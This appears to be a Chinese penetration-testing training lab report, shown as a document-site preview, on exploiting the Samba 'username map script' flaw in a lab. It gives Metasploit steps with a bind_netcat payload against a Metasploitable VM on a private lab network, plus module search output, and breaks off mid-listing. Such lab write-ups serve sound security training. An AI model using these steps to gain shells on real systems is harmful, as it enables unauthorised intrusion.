渗透测试 实验报告 中国移动安全部
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
渗透测试培训3月13日
第一天:主要实验总结
首先利用struts2漏洞,可以直接执行任意命令,取得主机控制权。
实验环境:
KALI linux 作为攻击工具;
owasp 作为靶机
2003 metaspoitable 实现能够成功访问
使用metaspliot完成对于靶机samba 服务的攻击,获取shell 权限
search samba 查找模块
Use multi/samba/usemap_script 选择渗透攻击模块
Show payloads 查看与该渗透模块相兼容的攻击载荷
Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shell Show options 查看需要设置的参数
Set RHOST 10.10.10.254 设置主机攻击主机
Exploit启动攻击
1、首先安装vm虚拟机程序,开启kali,owasp和metaspoitalbe等工具和搭建环境,使得网络可达,网络配置上选择nat模式,地址围为10.10.10.0/24
2、开启kali虚机,进入root模式,
首先进入msfconsle,修改初始密码为123456
msf〉> passwd
[*] exec: passwd
输入新的UNIX 密码:
重新输入新的UNIX 密码:
passwd:已成功更新密码
然后寻找samba模块
msf > search samba
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal
Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow
exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution
exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC)
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC)
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution
exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow
post/linux/gather/enum_configs normal Linux Gather Configurations
msf > use multi/samba/usermap_script 选择渗透攻击模块
msf exploit(usermap_script) > show payloads 查看与该渗透模块相兼容的攻击载荷Compatible Payloads
===================
Name Disclosure Date Rank Description